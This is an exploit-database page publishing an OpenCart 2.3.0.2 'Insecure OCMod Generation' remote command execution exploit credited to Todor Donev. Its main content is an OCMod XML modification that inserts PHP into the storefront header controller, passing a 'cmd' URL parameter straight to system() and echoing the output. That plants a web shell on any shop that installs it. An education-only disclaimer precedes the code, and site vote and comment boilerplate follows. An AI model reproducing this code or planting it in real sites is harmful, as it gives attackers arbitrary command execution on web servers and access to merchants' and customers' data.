Opencart 2.3.0.2 Insecure OCMod Generation Remote Command Execution

2019.08.06
Credit: Todor Donev
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

<?xml version="1.0" encoding="utf-8"?> <!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE --> <!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> --> <!-- Disclaimer: --> <!-- This or previous programs is for Educational --> <!-- purpose ONLY. Do not use it without permission. --> <!-- The usual disclaimer applies, especially the --> <!-- fact that Todor Donev is not liable for any --> <!-- damages caused by direct or indirect use of the --> <!-- information or functionality provided by these --> <!-- programs. The author or any Internet provider --> <!-- bears NO responsibility for content or misuse --> <!-- of these programs or any derivatives thereof. --> <!-- By using these programs you accept the fact --> <!-- that any damage (dataloss, system crash, --> <!-- system compromise, etc.) caused by the use --> <!-- of these programs is not Todor Donev's --> <!-- responsibility. --> <!-- Use them at your own risk! --> <!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml --> <modification> <name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name> <code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code> <version>1.0</version> <author>Todor Donev</author> <link>mailto:todor.donev@gmail.com</link> <file path="catalog/controller/common/header.php"> <operation> <search><![CDATA[// For page specific css]]></search> <add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){ echo "<pre>"; $cmd = ($this->request->get['cmd']); system($cmd); echo "</pre>"; }]]></add> </operation> </file> </modification>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top